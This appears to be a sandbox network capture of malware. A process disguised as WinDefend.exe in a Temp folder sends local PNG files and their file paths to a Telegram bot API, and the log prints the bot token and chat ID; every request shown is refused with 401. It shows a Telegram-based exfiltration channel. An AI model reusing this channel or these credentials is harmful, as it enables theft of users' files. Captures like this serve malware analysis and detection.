2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: f0 ce f2 89 aa fe 0e b3 bd 9f 32 b6 f1 4e 16 ff 3b a4 3d ab 2b 2b 95 e5 e5 47 c9 85 c0 9f 93 13 13 bf 4d 8e 74 34 02 0e ee f2 8e 00 c3 fb 5b 32 33 3d 7d 34 78 0d 6e cf 3d fe 51 dc e5 3b 03 d3 3f a4 79 dc f6 bc b3 0d 78 e4 ef 6b 3f f7 b0 e0 41 f8 db 83 3f bf 27 2c 0e 1e 07 3c 1d d8 6f 47 2f d3 d1 d6 96 db 8c 1f 7e 5f 8e 16 28 f0 19 9f b8 1f f0 50 ef d4 2e f0 95 c6 7f b4 fa 37 b7 d9 e0 91 b9 20 c7 51 da ab f7 14 37 bc bf 67 fe d6 fb f8 37 49 7c ff c0 47 f1 47 dc 6e 81 09 ec 5f 2d be 00 2d b8 0e de 6f e4 6d e6 50 70 67 96 86 47 e3 ec 4b 2c 97 60 7a 13 c0 45 6c 75 e8 85 65 a4 18 95 23 1b 56 00 2a f7 b5 4c e9 ef b4 97 0f 38 73 da 5c c3 d5 b7 67 af 8f 1b 11 03 a8 00 e1 4d 47 b0 91 fe b1 47 cf ee 3a b9 d5 ed 4e 43 af 6f 0a 65 a9 a8 cb 41 d9 47 d3 d0 2c b3 27 12 Data Ascii: 2N;=++GMt4[23=}4xn=Q;?yxk?A?',<oG/~_(P.7 Q7g7I\|GGn_--omPpgGK,`zElue#V*L8s\gMGG:NCoeAG,'
2024-05-23 13:35:36 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:36 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
191	192.168.2.5	61240	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:36 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="44e30c7b-5b2a-43ab-81ab-fb4fca171edb" Host: api.telegram.org Content-Length: 65268 Expect: 100-continue
2024-05-23 13:35:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:36 UTC	40	OUT	Data Raw: 2d 2d 34 34 65 33 30 63 37 62 2d 35 62 32 61 2d 34 33 61 62 2d 38 31 61 62 2d 66 62 34 66 63 61 31 37 31 65 64 62 0d 0a Data Ascii: --44e30c7b-5b2a-43ab-81ab-fb4fca171edb
2024-05-23 13:35:36 UTC	115	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=aic_file_icons.png; filename*=utf-8''aic_file_icons.png
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0e bc 00 00 00 80 08 06 00 00 00 e3 87 28 7b 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 40 00 49 44 41 54 78 01 ec 5d 07 7c 53 55 17 3f af 69 ba 5b 28 65 96 d1 16 ca 14 51 91 ad 20 22 ca 92 25 8a 28 a0 38 40 c4 2d 7e 0e 10 45 d9 88 7c 1f 28 a2 28 8a 0c 71 b0 41 36 c8 90 bd 41 64 95 51 28 05 ca e8 a4 2b 4d de 77 ce 0b 49 93 34 49 93 34 e3 25 39 97 5f e8 7d f7 dd 77 df bd ff 7b 4f ee cd b9 e7 7f 8f 00 56 c2 da b5 6b 2b 14 15 15 f5 12 45 b1 0f 7e ea 08 82 50 03 b3 87 5b 79 44 0e b7 0a b0 12 c9 58 df 13 58 df 8d 01 01 01 8b ba 75 eb 76 55 0e 15 f3 e6 3a 6c d8 b0 a1 5c 41 41 c1 64 6c c3 d3 88 6d 39 5b da 82 f8 67 e0 67 12 e2 3f d1 96 fc ce cc b3 7a f5 ea 60 b5 5a fd 32 96 f9 2e 7e 6a 3b b3 6c 83 b2 ce 62 Data Ascii: PNGIHDR({sRGB@IDATx]\|SU?i[(eQ "%(8@-~E\|((qA6AdQ(+MwI4I4%9_}w{OVk+E~P[yDXXuvU:l\AAdlm9[gg?z`Z2.~j;lb
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: cb bb e1 68 28 19 67 79 67 79 2f 39 2a bc 37 a5 34 79 f7 f7 f5 bc 4e de 69 bd 9b 9b 9b 6b da d1 3e b3 9e 37 6d d8 f9 f3 e7 f3 d0 2b 2a 1d 13 e9 f5 eb 79 c3 b6 1d 3d 7a 14 2e 5e bc 48 49 bc 9e 37 00 86 7f bf 6b c1 60 79 67 79 37 10 0b af 8f 8a b5 2a 3e 8e 06 06 2b d0 08 c2 78 1f a1 6a 35 80 6e 3d 01 1e ed 8c 47 ee e3 c1 5e 9e f4 d0 e9 49 94 55 2a 74 77 bd 04 e0 eb a9 00 c9 17 8c 6b 22 8a e9 a0 51 b7 15 2e de f2 98 be 4e 4c a8 2c c2 39 fb 0f 82 35 6e 88 99 ab 9f be cb 83 09 9f 67 43 51 6e 0b e1 7c 86 cd fa 3a 31 be f2 6e dc 91 6a 09 13 ff 0b d0 f7 59 33 05 7b 38 e9 a3 e1 b8 43 31 1f 2b 81 27 c9 8b e8 a5 f7 c2 75 d6 d7 21 1a 3c bf 6b c7 a5 bf ce ef 65 d0 d7 49 fb 77 72 d5 d7 f1 7a de bc 9d 80 4e de 59 3f af d5 cf 27 25 25 41 4e 4e 8e e9 e4 c4 fa 79 13 44 58 Data Ascii: h(gygy/974yNik>7m+y=z.^HI7k`ygy7>+xj5n=G^IUtwk"Q.NL,95ngCQn\|:1njY3{8C1+'u!<keIwrzNY?'%%ANNyDX
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: 5e 71 f5 66 24 ef 45 37 52 21 7b e3 6f 46 7d cd 17 e6 11 20 d2 6b c6 1f 5f 1b df 44 4f af e8 06 7b ab 9c 48 af 41 b5 ea 43 40 68 38 e4 fd bb 4f fa 04 c5 d5 87 2a ef cf 84 40 4c b7 39 a0 83 19 5f 5d cf a7 cf 9b 0c 19 bf 7f 45 87 d8 28 2d 91 5e c9 f0 a0 8b cd 60 f9 60 46 ec 7c f6 f4 ea 83 fd ea 27 4d aa 8d ed fc 1a 0d 08 0f 2f 5f be 3c d6 c7 da 6c f4 bd 44 e4 37 1f d5 bb b8 a4 db cc 91 5e 11 bf 08 7c 99 2c 8c e4 5d d2 68 1f 2c d4 8f 48 af 25 e4 dd 07 bb d3 65 4d b2 b0 c9 2e 79 82 93 23 e9 95 c8 ae d3 a6 4d 83 f4 f4 74 18 3b 76 2c da c0 f2 c9 a2 34 38 fc 68 93 9d e5 bd 0c df 06 de 20 ef 45 68 10 ff f9 e7 9f c3 e5 cb 97 2d b6 34 25 25 45 ca 43 79 fd 31 f8 b3 bc f3 7a de f6 11 6f ce 48 5e 2e eb 79 85 c2 78 13 dd b0 55 e6 94 ec 86 f7 fd 2d 4e 86 51 0d 1b 36 a4 Data Ascii: ^qf$E7R!{oF} k_DO{HAC@h8O*@L9_]E(-^``F\|'M/_<lD7^\|,]h,H%eM.y#Mt;v,48h Eh-4%%ECy1zoH^.yxU-NQ6
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: 79 e5 1a 72 72 72 60 d7 ae 5d 40 07 52 d0 1c 7d fd fa 75 e9 3b 2c 26 26 06 62 63 63 25 72 0b 19 c1 46 44 90 fe b3 ec 81 e5 bd ec 18 fa 43 09 e6 8c e4 b1 dd 1e 5b cf bf f6 da 6b 40 73 20 85 3f fe f8 03 96 2d 5b 26 c5 c9 8b 2b c9 8c b9 40 04 31 57 13 62 5f 7a e9 25 b8 76 ed 9a b9 d7 db 94 46 07 d2 fc f0 c3 0f 36 e5 75 24 13 ad 17 68 7e e7 f5 bc 23 e8 f9 cf 33 72 93 77 73 c8 d3 38 5e b4 68 11 d4 af 5f 1f c8 e0 4c 2e e1 f3 cf 3f 87 d4 d4 54 97 57 87 be e7 26 4d 9a 04 b3 67 cf 06 5a 1f 98 0b 2c ef e6 50 e1 b4 12 08 98 23 bd d2 fc 2e c8 80 f4 fa 33 ce 87 ed 1f 41 cd e1 9f e8 fb 0f b7 91 d2 6f 01 8c fe 08 e0 b1 ae 5a 02 6c 3a 9e 15 ba 0e ef fd 6f 66 89 66 c9 26 61 2b 9e ee 4e 1e 6a f7 ee 02 18 f9 1f 80 5f b5 eb 15 a7 d7 6f d0 60 22 bc 52 b1 ac af 73 3a b8 be 53 Data Ascii: yrrr`]@R}u;,&&bcc%rFDC[k@s ?-[&+@1Wb_z%vF6u$h~#3rws8^h_L.?TW&MgZ,P#.3AoZl:off&a+Nj_o`"Rs:S
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: 48 de df 47 06 b7 df 17 11 b0 b4 e9 46 9e 9d 91 f4 da cd 9d a4 57 f2 f2 4a 1f 6f 0c 85 68 04 fc c9 27 9f c0 f9 f3 e7 21 2a 2a 4a 32 8e 21 12 1f 07 46 40 4e 08 c8 29 27 3f e3 00 00 40 00 49 44 41 54 41 de 89 d0 4a 46 a8 a6 27 30 cb 09 27 aa 0b 79 85 1b 37 6e 1c 68 34 9a 32 57 8d 08 b3 e3 c7 8f 87 d9 b3 67 43 b9 72 6c 48 5f 66 40 b9 00 9b 10 b0 60 24 ef d7 eb 79 9a 97 c9 b0 cf 91 40 df 5d 74 52 3c 07 46 40 8e 08 b8 5b de 49 5f 30 68 d0 20 3c 35 d6 e4 d8 78 2b e0 10 d9 95 bc 2c b9 2b ec df bf 5f 22 bb 92 d1 7a ef de bd 5d f6 5a 22 f2 d2 41 1e 3b 77 ee 64 c2 ab cb 50 e6 82 8d 10 30 4f 7a 0d 04 57 92 5e d1 83 33 e4 e7 03 64 a1 cc cf 46 a2 7b 78 b8 51 95 bc f6 a2 69 33 80 0d 6b d0 6b ed 4e 80 7b ee f3 da 66 70 c5 7d 17 01 77 cf ef be 8b 24 b7 8c 11 90 3f 02 72 Data Ascii: HGFWJoh'!**J2!F@N)'?@IDATAJF'0'y7nh42WgCrlH_f@`$y@]tR<F@[I_0h <5x+,+_"z]Z"A;wdP0OzW^3dF{xQi3kkN{fp}w$?r
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: bd 92 97 06 93 50 0d 37 82 3f 37 49 e3 4b 46 80 11 f0 72 04 68 d3 8d 0c 58 4d 42 35 fc a1 39 d6 24 cd ef 2e 37 6e dc 08 df 7f ff bd b4 51 30 72 e4 48 b8 f7 5e 34 8c 35 09 f6 92 5d e9 f1 9c 9c 1c 93 52 f8 92 11 70 0f 02 2c ef c6 38 a7 a7 3b ce 09 b8 fb ee bb 61 fa f4 e9 92 21 81 71 a9 da ab 1b 37 6e 98 4b e6 34 46 c0 6d 08 90 91 7c 42 42 82 e9 fb 78 3d 6f 8a 88 8b ae d9 80 d6 45 c0 72 b1 66 11 60 79 37 0b 8b 51 22 ad bf 33 33 33 61 ce 9c 39 92 01 20 79 b6 a0 03 c3 38 30 02 5e 87 00 91 5e 5f 18 62 5c 6d 41 a8 06 8a 20 a7 ea eb 92 92 92 60 c6 8c 19 f0 ea ab af 1a bd ab a0 40 7b 8a 34 91 c8 0e 1f 3e 6c 74 4f 96 17 85 58 df 15 8b 01 62 ab 03 3c d0 0e 60 f0 30 80 6f bf 92 65 55 b9 52 8c 80 29 02 3c bf 9b 22 c2 d7 8c 80 ef 22 c0 fa 3a e3 be 35 25 a8 1a df b5 ff Data Ascii: P7?7IKFrhXMB59$.7nQ0rH^45]Rp,8;a!q7nK4Fm\|BBx=oErf`y7Q"333a9 y80^^_b\mA `@{4>ltOXb<`0oeUR)<"":5%
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: 9f 99 0e b8 21 cf 50 f3 e7 cf d7 a7 71 c4 fb 10 50 e0 16 f9 db 0f 06 59 ad b8 5a 23 c2 d2 7f 8b 20 db 98 17 61 f5 19 c3 9b ca 00 11 c6 75 0c 36 22 bb ea ee 0f 6f 1b 04 5b 2f a8 21 e9 a6 7b 0c f2 b7 27 9b 78 94 15 6c d7 d7 e5 17 8a 59 b1 91 10 95 9a ad ab bd 73 ff 62 d9 40 ef 70 6e a9 e6 4b 0b 09 14 a1 79 0d 85 fe e6 4f fb 0b e1 b6 19 1b f9 07 e3 14 70 6f ac 36 df a3 89 81 f0 f9 66 33 99 f4 a5 70 44 2e 08 f4 2c df 08 9a 85 d7 30 5b 9d fd b7 53 60 7f 9e f1 9e ac d9 8c 0e 26 76 8a aa 07 3d a3 1b 99 7d 3a 5d 9d eb 36 c2 2b 55 60 47 4e b2 71 3d 04 88 37 4e b0 7c 95 af 29 cc aa 16 18 15 75 a5 c8 35 22 89 65 03 bd c3 72 0d dc 77 27 a3 28 57 ff b2 1a e8 11 97 5c 6e 89 b8 3d c3 c1 33 08 e4 e2 3e f4 0b 83 5f 82 e0 60 83 c3 19 0c aa 72 df fd 4d 61 c8 a0 c1 06 29 b6 Data Ascii: !PqPYZ# au6"o[/!{'xlYsb@pnKyOpo6f3pD.,0[S`&v=}:]6+U`GNq=7N\|)u5"erw'(W\n=3>_`rMa)
2024-05-23 13:35:36 UTC	4096	OUT	Data Raw: a9 4a c0 a7 53 9d 73 4c d4 9a 04 48 40 43 a0 46 8d 1a 90 eb 6b f2 60 aa cc c4 14 8f 4f 7d fa f4 c9 ac 09 a3 79 55 aa 54 31 9a c7 0c cb 13 d0 f7 06 6d ae b1 b2 d4 4a ae db ca b5 1d f9 bb fb 9d 77 de 41 b3 66 cd 2c af 2c 5b 74 38 02 d9 31 78 9d 35 6b 96 c3 e9 ef ce 0a 71 7d de 9d af be e1 d8 b9 3e 6f c8 c3 5d 62 73 e6 cc 31 69 a8 e9 7f f3 a5 8f 2b 35 22 9f c5 ce 9b 37 4f 29 8b 69 24 40 02 36 24 50 d0 4f 85 a7 8a 64 34 78 4d 4c 56 23 97 67 c6 b5 f2 66 e5 3c cc 32 78 95 43 fa 60 6b 02 3e 6b a9 46 ab 90 54 63 2a 99 76 f1 5e b2 26 fd 8e ed ce bd 96 dd ba bd 84 06 a7 6d 45 97 de 5b 6f a5 6d 9f 52 64 b3 2f 22 19 7d 6b a7 66 c9 7b b9 e6 e5 bd b0 2e 2c 73 23 59 c5 86 98 48 02 24 e0 b0 04 6e 3e 8e 46 ef cb ab 30 a5 c4 f3 a8 e8 57 24 53 3d 63 52 12 33 cd 67 a6 65 08 Data Ascii: JSsLH@CFk`O}yUT1mJwAf,,[t81x5kq}>o]bs1i+5"7O)i$@6$POd4xMLV#gf<2xC`k>kFTc*v^&mE[omRd/"}kf{.,s#YH$n>F0W$S=cR3ge
2024-05-23 13:35:36 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:36 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
192	192.168.2.5	61241	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:36 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:35:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:36 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 34 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+48.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:37 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:36 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
193	192.168.2.5	61242	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:37 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 241 Expect: 100-continue
2024-05-23 13:35:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:37 UTC	241	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 5f 72 65 74 69 6e 61 5f 74 68 75 6d 62 5f 6e 65 77 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 66 69 6c 65 5f 74 79 70 65 73 25 35 43 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 5f 72 65 74 69 6e 61 5f 74 68 75 6d 62 5f 6e 65 77 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 35 30 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+aic_file_icons_retina_thumb_new.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cfile_types%5Caic_file_icons_retina_thumb_new.png%0ASize%3A+50+KB
2024-05-23 13:35:37 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:37 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
194	192.168.2.5	61244	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:37 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="450d2adc-5542-4edd-b4f8-1b35fd069840" Host: api.telegram.org Content-Length: 2697 Expect: 100-continue
2024-05-23 13:35:38 UTC	40	OUT	Data Raw: 2d 2d 34 35 30 64 32 61 64 63 2d 35 35 34 32 2d 34 65 64 64 2d 62 34 66 38 2d 31 62 33 35 66 64 30 36 39 38 34 30 0d 0a Data Ascii: --450d2adc-5542-4edd-b4f8-1b35fd069840
2024-05-23 13:35:38 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 34 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 34 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=48.png; filename*=utf-8''48.png
2024-05-23 13:35:38 UTC	2381	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 09 14 49 44 41 54 68 81 ed 59 7d 8c 5c 55 1d 3d e7 de f7 66 3f 67 77 fa 09 94 06 a8 ad a9 81 68 5b 77 0b c1 0a 71 b7 86 84 3f 8c a2 58 11 21 28 d6 10 fe 41 4c 20 51 8c 71 fd db 10 14 84 04 28 35 a2 41 ba 18 04 35 c1 c4 40 eb 47 5b 49 5a 29 04 9a 0a 18 68 23 50 da d2 fd 9a d9 d9 99 77 ef 3d fe f1 de 9b 9d dd ee 6e 0b dd 12 62 7a 36 93 99 f7 de cc bd e7 dc 7b 7e 1f ef 2d 70 16 67 71 16 ff 5f 18 04 ec 5c c7 1f 26 34 38 75 ee e9 c7 73 e2 1f 8b 17 17 9b 8f 07 00 33 4f bc 4e 0a 0d 4c 9d 4b 4f a3 38 db 77 d9 7c f0 0a 50 28 af b8 f0 0e 01 5f 75 d0 39 05 f2 1d 09 8f 1f 7c e3 e0 cf 37 01 f5 41 c0 6e 02 fc 99 22 0e a4 ab cc 4d f0 1a 44 9b 5b 6c be 67 8d b9 d6 27 Data Ascii: PNGIHDR00WIDAThY}\U=f?gwh[wq?X!(AL Qq(5A5@G[IZ)h#Pw=nbz6{~-pgq_\&48us3ONLKO8w\|P(_u9\|7An"MD[lg'
2024-05-23 13:35:38 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 34 35 30 64 32 61 64 63 2d 35 35 34 32 2d 34 65 64 64 2d 62 34 66 38 2d 31 62 33 35 66 64 30 36 39 38 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --450d2adc-5542-4edd-b4f8-1b35fd069840Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:38 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:38 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 34 35 30 64 32 61 64 63 2d 35 35 34 32 2d 34 65 64 64 2d 62 34 66 38 2d 31 62 33 35 66 64 30 36 39 38 34 30 2d 2d 0d 0a Data Ascii: --450d2adc-5542-4edd-b4f8-1b35fd069840--
2024-05-23 13:35:38 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:38 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:38 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
195	192.168.2.5	61245	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:37 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="b63a9645-c24d-4da1-9bfd-d9260256b1fa" Host: api.telegram.org Content-Length: 140637 Expect: 100-continue
2024-05-23 13:35:38 UTC	40	OUT	Data Raw: 2d 2d 62 36 33 61 39 36 34 35 2d 63 32 34 64 2d 34 64 61 31 2d 39 62 66 64 2d 64 39 32 36 30 32 35 36 62 31 66 61 0d 0a Data Ascii: --b63a9645-c24d-4da1-9bfd-d9260256b1fa
2024-05-23 13:35:38 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 37 65 63 39 36 39 61 36 32 35 39 38 66 62 66 61 31 65 65 31 65 62 38 38 32 37 61 30 66 32 65 35 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 37 65 63 39 36 39 61 36 32 35 39 38 66 62 66 61 31 65 65 31 65 62 38 38 32 37 61 30 66 32 65 35 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=7ec969a62598fbfa1ee1eb8827a0f2e5.png; filename*=utf-8''7ec969a62598fbfa1ee1eb8827a0f2e5.png
2024-05-23 13:35:38 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 bc 00 00 03 cd 08 06 00 00 00 aa 3d 66 53 00 00 80 00 49 44 41 54 78 da ec dd 07 58 14 d9 de 2e fa 7d cf 0d e7 9e fb 3c e7 9c ef db df 9e 3d 26 8c 98 f3 8c 8e 39 8f 39 e7 00 98 03 20 8a 88 80 98 09 8a 39 a0 a3 e3 38 e6 9c 50 31 0b 06 50 82 01 01 09 22 39 c7 86 26 e7 e6 bd b5 0a 1a 9a 60 9a 31 31 f3 fe f6 fe 0f d2 d5 55 bd ba 42 53 6f af 0a ff 78 f4 e8 11 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 fa 2b 55 40 40 00 fe f1 fc f9 73 f9 1f 35 95 bf bf bf fc 33 24 24 04 11 11 11 2c 16 eb 33 95 d8 c6 34 b7 39 16 8b c5 62 b1 58 2c 16 8b f5 c7 4a 64 dc f2 c0 2b fe 93 9c 9c fc d6 ca cb cb 03 11 7d 7e f9 f9 f9 ef dc 16 59 2c 16 8b c5 62 b1 58 2c d6 fb 4b 64 dc f7 06 de a4 a4 24 28 95 4a a6 10 a2 2f 48 6c 73 62 db 7b Data Ascii: PNGIHDR=fSIDATxX.}<=&99 98P1P"9&`11UBSoxX,bX,+U@@s53$$,349bX,Jd+}~Y,bX,Kd$(J/Hlsb{
2024-05-23 13:35:38 UTC	4096	OUT	Data Raw: 39 49 e5 8c ab bf af c2 80 de d3 e1 14 53 0c e4 f9 55 3b 87 17 48 86 f5 84 61 98 29 f7 58 16 e1 86 cd 34 b4 e9 3a 0b f7 7d d2 6a 0c b8 95 bb 77 93 b1 63 66 7f 4c 30 b3 87 b3 b3 93 fc 9a ce d2 6b ef 31 9d 8a e1 d3 37 41 ee 27 ce 0e c5 aa b9 03 30 71 c9 2a 58 59 9b 61 c3 b6 df 10 99 51 7a 68 6b d8 d5 4d 98 a0 67 06 3f 75 36 cc f0 c6 82 91 fd 60 f0 4b 0d f7 22 ce f5 2d 1d b6 af e6 fb 14 bf 3c 62 26 85 e1 8d 88 54 37 31 d5 0d ba a3 47 c1 ea f2 eb f2 e7 dc d8 b8 50 7a bd dd 48 50 3e 85 ce a0 01 58 7d f6 75 8d d3 7a b8 73 11 26 9b ee 47 f9 dc cf 7d 81 45 52 e0 b5 be 14 28 07 de c3 66 a3 31 78 6d cd bd b0 79 01 d7 30 6b c2 74 dc 8a af b8 aa f3 83 3d c6 18 34 d4 12 a1 69 af 61 36 79 00 66 6e be 89 f2 6b 59 a9 5e c1 78 fa 64 d8 df af fd 81 57 1c 9d f0 f2 e5 cb 4a Data Ascii: 